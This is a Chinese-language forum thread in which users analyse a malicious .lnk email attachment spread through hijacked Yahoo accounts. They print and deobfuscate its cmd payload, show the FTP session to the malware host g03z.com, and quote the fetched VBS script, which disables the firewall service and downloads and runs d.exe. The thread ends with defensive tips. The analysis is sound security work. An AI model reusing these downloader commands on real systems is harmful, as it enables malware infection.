Yahoo 信箱寄過來的病毒檔，是何種病毒?

每隔一段時間，就會收到不同朋友使用 Yahoo 信箱寄過來的病毒檔，將該病毒檔上傳到 VirusTotal 又檢查不出病毒...

請問透過 Yahoo 信箱所寄的病毒，是 User 使用中毒電腦登入 Yahoo 信箱，病毒才透過Yahoo 信箱寄信給通信錄名單嗎?

還是 Yahoo 信箱帳密被盜，被人假用名義寄信..

我將該病毒檔上傳到 VirusTotal 網站又檢測不出問題，真是怪異!

病毒信，信件內容如下:
########################################
給你看我在網路上的第11個老婆的相片


10.15:9


___________________________________________________
您的生活即時通 － 溝通、娛樂、生活、工作一次搞定！
[URL]http://messenger.yahoo.com.tw/[/URL]
##############################################

所夾帶的附檔以上傳

Yahoo帳號被盜用,才從Yahoo寄信出來
(不管是透過標準SMTP還是Yahoo Webmail)
那個是"一連串動作的捷徑"
並不是木馬本體
掃不出來,很正常

NIS 2010全殺
另外VT當然掃不出毒
因為他是做個捷徑到正常檔案

"3.5 KB" 頂多只是惡意網站連結

[QUOTE=FYI;1072977]"3.5 KB" 頂多只是惡意網站連結[/QUOTE]
FYI兄有興趣可以玩玩這東西
你就把它當.BAT檔來看就行了
.BAT檔如果有2K,能做的事情就多到跟山一樣了...

[QUOTE=tvirus;1072983]FYI兄有興趣可以玩玩這東西
你就把它當.BAT檔來看就行了
.BAT檔如果有2K,能做的事情就多到跟山一樣了...[/QUOTE]
.BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了

用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"

[QUOTE=FYI;1072986].BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了

用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"[/QUOTE]
是沒那麼容易執行啊
因為都要使用者自己笨笨的點下去啊 :fd:
既然都點下去了,當然就愛怎麼搞就怎麼搞

我不知道在大多數人的環境下,看不看得到那個副檔名??
(沒在用Outlook express,也很少用Webmail...)

PS:其實應該要問,他們到底在不在意中木馬?

請問那個 *.lnk 病毒的內容的目標欄位應該是指令，這些指令為何好像都被編碼?
請問如何將他還原為一般的指令?

%coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&

[QUOTE=~GG~;1072998]請問那個 *.lnk 病毒的內容的目標欄位應該是指令，這些指令為何好像都被編碼?
請問如何將他還原為一般的指令?

%coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&[/QUOTE]
抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?

[QUOTE=FYI;1073010]抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?[/QUOTE]
透過Prcview去看看這LNK做了啥事...
1.
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&
2.
Ftp -s:j


先將1的部份以&來斷行
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j
SeT N=.
sET y=G03
sET v=33
SeT e=echO
EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B
EChO %E%AA%v%^>^>j>>B
ecHO %E%bb%v%^>^>j>>B
echo %e%rECV r r.Vbs^>^>J>>B
ECho %E%bY^>^>J>>b
ECho Ft%M%>>b
EchO STaRT r.VBs>>b
reN b u.BAT
CaLl U.Bat&

因為開始目錄為%windir%
所以在C:\WINDOWS產生了u.bat及J
C:\WINDOWS>type u.bat
%e%o WWw%n%%y%Z%N%CoM>J
%E%AA%v%>>j
%E%bb%v%>>j
%e%rECV r r.Vbs>>J
%E%bY>>J
Ft%M%
STaRT r.VBs

C:\WINDOWS>type j
o www . g03z . com
AA33
bb33
rECV r r.Vbs
bY

所以...目地是用ftp指令,代入script檔案J連到www . g03z . com
帳號密碼輸入後,抓r.vbs回來,然後下指令by斷線
過程:
C:\WINDOWS>ftp www . g03z . com
Connected to www . g03z . com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www . g03z . com:(none)): AA33
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> rECV r r.Vbs
200 PORT Command successful.
150 Opening ASCII mode data connection for r (1327 Bytes).
226-Maximum disk quota limited to 102400 kBytes
Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 1327 bytes received in 0.01Seconds 88.47Kbytes/sec.
ftp> by
221 Goodbye!
====================================================
然後u.bat最後再start r.vbs

至於那個r.vbs內容是啥...呃...交給你們了...

睡覺前最後PS:
那個g03z,好像是有名的放毒站...
最糟糕的是
主機它在台灣 :Q
[url]http://www.db.ripe.net/whois?form_type=advanced&full_query_string=&searchtext=202.153.172.43&do_search=Search&inverse_attributes=None&ip_search_lvl=Default%28nearest+match%29&alt_database=ALL&object_type=All[/url]

Domain Name : g03z.com
PunnyCode : g03z.com
Creation Date : 2009-01-08 16:50:39
Updated Date : 2009-01-08 16:50:39
Expiration Date : 2010-01-08 16:50:21

Registrant:
Organization : ggg zzz
Name : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234

Administrative Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email][email protected][/email]

Technical Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email][email protected][/email]

Billing Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email][email protected][/email]

Registry Status: ok

這台主機在 isp 是方電訊 哩.. 那ISP沒責任通知客戶可能主機被當木馬或行為異常嗎

r.vbs 動作

cmd /c net stop sharedaccess
echo o www.g03z.com>i.txt
echo aa33>>i.txt
echo bb33>>i.txt
echo get d d.exe>>i.txt
echo bye>>i.txt
ftp -s:i.txt
del i.txt
d.exe
del ?.vbs
del d.exe
start [url]http://tw.match.yahoo.com/[/url]
del ? ?.bat 0

基本上這一陣子的mail lnk病毒只要不允許FTP.EXE執行就可以全檔掉了.

[QUOTE=sylovanas;1073288]基本上這一陣子的mail lnk病毒只要不允許FTP.EXE執行就可以全檔掉了.[/QUOTE]
小弟再也不敢輕忽只有兩三Kbytes 的郵件了, 但是某些同事有時需要造訪外部FTP Server, 所以不能完全禁止FTP, 只能自求多福

或者是將FTP.EXE改名，平常用改名的FTP.EXE作業
像是FTP.EXE => FTP1.EXE
之後使用權限或IFEO或本機安全性原則鎖FTP.EXE不知可不可行？

[URL="http://www.microsoft.com/taiwan/technet/security/advisory/973882.mspx"]Microsoft 安全性摘要報告 (973882)： Microsoft Active Template Library (ATL) 中的弱點可能會允許遠端執行程式碼[/URL]
[LIST][*]依照預設，所有 Microsoft Outlook 及 Microsoft Outlook Express 支援版本都會在 [限制的網站] 區域開啟 HTML 電子郵件訊息。 [限制的網站] 區域可阻止讀取 HTML 電子郵件訊息時使用 Active Scripting 與 ActiveX 控制項，有助於減輕企圖利用這個弱點的攻擊。然而，如果使用者按下電子郵件訊息中的連結，仍有可能因為網頁式攻擊而受此弱點遭利用的影響。[*]在網頁式攻擊的案例中，攻擊者可架設一個網站，並在其中包含利用此弱點的網頁。此外，受侵害的網站以及接受或存放使用者提供之內容或廣告的網站裡，也可能包含蓄意製作以利用本弱點的內容。 但是，攻擊者無法強迫使用者造訪網站，而是引誘使用者自行前往。一般的做法是設法讓使用者按一下電子郵件或 Instant Messenger 訊息中通往攻擊者網站的連結。[/LIST]
[URL="http://www.microsoft.com/taiwan/technet/security/bulletin/ms09-034.mspx"]Microsoft 安全性公告 MS09-034 - 重大： Internet Explorer 積存安全性更新 (972260)[/URL]
[LIST][*][URL="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&FamilyID=22bed634-5227-4a22-8df5-801f3e2e232a"]下載詳細資料： KB972260：Internet Explorer for Windows XP 安全性更新[/URL] (for IE6 x86)[/LIST]

[QUOTE=FYI;1073308][URL="http://www.microsoft.com/taiwan/technet/security/advisory/973882.mspx"]Microsoft 安全性摘要報告 (973882)： Microsoft Active Template Library (ATL) 中的弱點可能會允許遠端執行程式碼[/URL]
[LIST][*]依照預設，所有 Microsoft Outlook 及 Microsoft Outlook Express 支援版本都會在 [限制的網站] 區域開啟 HTML 電子郵件訊息。 [限制的網站] 區域可阻止讀取 HTML 電子郵件訊息時使用 Active Scripting 與 ActiveX 控制項，有助於減輕企圖利用這個弱點的攻擊。然而，如果使用者按下電子郵件訊息中的連結，仍有可能因為網頁式攻擊而受此弱點遭利用的影響。[*]在網頁式攻擊的案例中，攻擊者可架設一個網站，並在其中包含利用此弱點的網頁。此外，受侵害的網站以及接受或存放使用者提供之內容或廣告的網站裡，也可能包含蓄意製作以利用本弱點的內容。 但是，攻擊者無法強迫使用者造訪網站，而是引誘使用者自行前往。一般的做法是設法讓使用者按一下電子郵件或 Instant Messenger 訊息中通往攻擊者網站的連結。[/LIST]
[URL="http://www.microsoft.com/taiwan/technet/security/bulletin/ms09-034.mspx"]Microsoft 安全性公告 MS09-034 - 重大： Internet Explorer 積存安全性更新 (972260)[/URL]
[LIST][*][URL="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&FamilyID=22bed634-5227-4a22-8df5-801f3e2e232a"]下載詳細資料： KB972260：Internet Explorer for Windows XP 安全性更新[/URL] (for IE6 x86)[/LIST][/QUOTE]
Oh
那些Yahoo病毒信沒這麼高竿
只是很單純的寫了一些文字
然後夾檔要讓你點下去而已
[IMG]http://www.pczone.com.tw/members/33275-albums14-picture-440.png[/IMG]

[QUOTE=FYI;1073308][URL="http://www.microsoft.com/taiwan/technet/security/advisory/973882.mspx"]Microsoft 安全性摘要報告 (973882)： Microsoft Active Template Library (ATL) 中的弱點可能會允許遠端執行程式碼[/URL]
[URL="http://www.microsoft.com/taiwan/technet/security/bulletin/ms09-034.mspx"]Microsoft 安全性公告 MS09-034 - 重大： Internet Explorer 積存安全性更新 (972260)[/URL][/QUOTE]
以上兩則報告建議將網際網路和近端內部網路的安全層級變更為高安全性, 要注意的是高安全性會關閉Javascript (Active scripting), 若是參照辦理, 則建議啟用Active scripting